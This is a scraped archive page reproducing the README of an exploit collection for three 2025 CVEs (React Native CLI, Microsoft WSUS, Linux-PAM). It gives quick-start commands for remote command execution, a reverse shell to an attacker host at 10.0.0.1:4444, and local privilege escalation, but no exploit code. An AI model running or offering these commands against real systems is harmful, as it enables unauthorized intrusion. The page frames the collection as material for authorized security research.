关联漏洞
描述
Comprehensive Proof of Concept collection for CVE-2025-11953, CVE-2025-59287, CVE-2025-8941 with exploitation frameworks in Python, C, Bash, PowerShell
介绍
# PoC CVE Collection
Comprehensive Proof of Concept collection for recent critical CVEs with complete exploitation frameworks.
## 🎯 Included CVEs
| CVE ID | Title | Severity | CVSS | Status |
|--------|-------|----------|------|--------|
| CVE-2025-11953 | React Native CLI RCE | Critical | 9.8 | PoC Available |
| CVE-2025-59287 | Microsoft WSUS RCE | Critical | 9.8 | Actively Exploited |
| CVE-2025-8941 | Linux-PAM Privilege Escalation | High | 7.8 | PoC Available |
## 📁 Repository Structure
```
PoC-CVE-collection/
├── CVE-2025-11953/ # React Native CLI RCE
│ ├── exploit-basic.sh
│ ├── exploit-advanced.py
│ ├── metasploit-module.rb
│ └── README.md
├── CVE-2025-59287/ # Microsoft WSUS RCE
│ ├── wsus-exploit.py
│ ├── wsus-exploit.ps1
│ ├── wsus-crypto.py
│ └── README.md
├── CVE-2025-8941/ # Linux-PAM Privilege Escalation
│ ├── pam-exploit.c
│ ├── pam-exploit.py
│ ├── check-vuln.sh
│ └── README.md
└── README.md # This file
```
## ⚠️ Disclaimer
**IMPORTANT**: These Proof of Concepts are provided for:
- Educational purposes
- Authorized security research
- Penetration testing with written permission
- Testing on your own systems
**NOT authorized for:**
- Unauthorized attacks
- Testing on third-party systems without permission
- Any illegal activities
## 🚀 Quick Start
### CVE-2025-11953 - React Native CLI
```bash
# Basic test
cd CVE-2025-11953
./exploit-basic.sh http://target:8081 calc.exe
# Advanced exploitation
python3 exploit-advanced.py --target http://target:8081 --command whoami
# Reverse shell
python3 exploit-advanced.py --target http://target:8081 --shell --lhost 10.0.0.1 --lport 4444
```
### CVE-2025-59287 - Microsoft WSUS
```bash
# Requires MachineKey
cd CVE-2025-59287
python3 wsus-exploit.py --target http://wsus:8530 --key MACHINEKEYHEX --command calc.exe
```
### CVE-2025-8941 - Linux-PAM
```bash
# Check vulnerability
cd CVE-2025-8941
./check-vuln.sh
# Exploit (requires local access)
python3 pam-exploit.py --threads 8 --triggers 1000
```
## 📚 Documentation
Each CVE directory contains:
- Detailed README with technical analysis
- Multiple PoC implementations
- Usage examples
- Mitigation strategies
- Detection rules
## 🔗 References
- [CVE-2025-11953 Analysis](https://jfrog.com/blog/cve-2025-11953)
- [CVE-2025-59287 MSRC](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287)
- [CVE-2025-8941 Red Hat](https://bugzilla.redhat.com/show_bug.cgi?id=2388220)
## 📝 License
MIT License - See LICENSE file for details.
## 👤 Author
**N3k0t** - Ethical Hacker & Security Researcher
- GitHub: [@N3k0t-dev](https://github.com/N3k0t-dev)
---
**Remember**: Use responsibly and ethically. Unauthorized access is illegal.
文件快照
[4.0K] /data/pocs/9cd42f62d5176cb6cc2ad495721881948603c201
├── [4.0K] CVE-2025-11953
│ ├── [6.5K] exploit-advanced.py
│ ├── [ 932] exploit-basic.sh
│ └── [2.7K] README.md
├── [4.0K] CVE-2025-59287
│ └── [1.6K] README.md
├── [4.0K] CVE-2025-8941
│ └── [3.7K] README.md
└── [2.8K] README.md
4 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。